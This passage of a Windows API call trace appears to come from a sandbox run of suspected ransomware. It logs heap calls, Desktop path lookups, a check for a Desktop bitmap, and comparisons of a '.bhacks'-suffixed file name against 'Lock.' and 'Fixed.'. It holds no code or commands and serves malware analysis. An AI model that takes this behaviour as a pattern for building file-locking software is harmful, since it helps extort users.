out: hHeap=0x2af0000) returned 1 [0103.576] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.576] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75fd8 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6300 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0103.577] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5d660 [0103.577] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/MH23a5.bmp", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\MH23a5.bmp", lpFilePart=0x8cf650*="MH23a5.bmp") returned 0x22 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0103.577] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\MH23a5.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\mh23a5.bmp")) returned 0xffffffff [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75fd8 | out: hHeap=0x2af0000) returned 1 [0103.577] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0103.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0103.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.578] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0103.578] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.578] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0103.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0103.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0103.578] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nYVw1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YVw1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vw1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n1XTh2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1XTh2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XTh2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Th2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ApcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pcS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cS7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w.mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0103.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0103.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0103.579] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0103.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0103.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0103.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0103.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0103.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0103.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e) returned 0x2a5de40 [0103.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nYVw1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YVw1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vw1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1n1XTh2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n1XTh2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1XTh2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XTh2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Th2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ApcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pcS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cS7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0103.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0103.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0103.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.582] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0103.582] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0103.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0103.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0103.582] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0103.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.582] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0103.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6178 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75498 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6178 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72708 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0103.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0103.584] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0103.584] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0103.584] CharUpperBuffW (in: lpsz="DesktopDir", 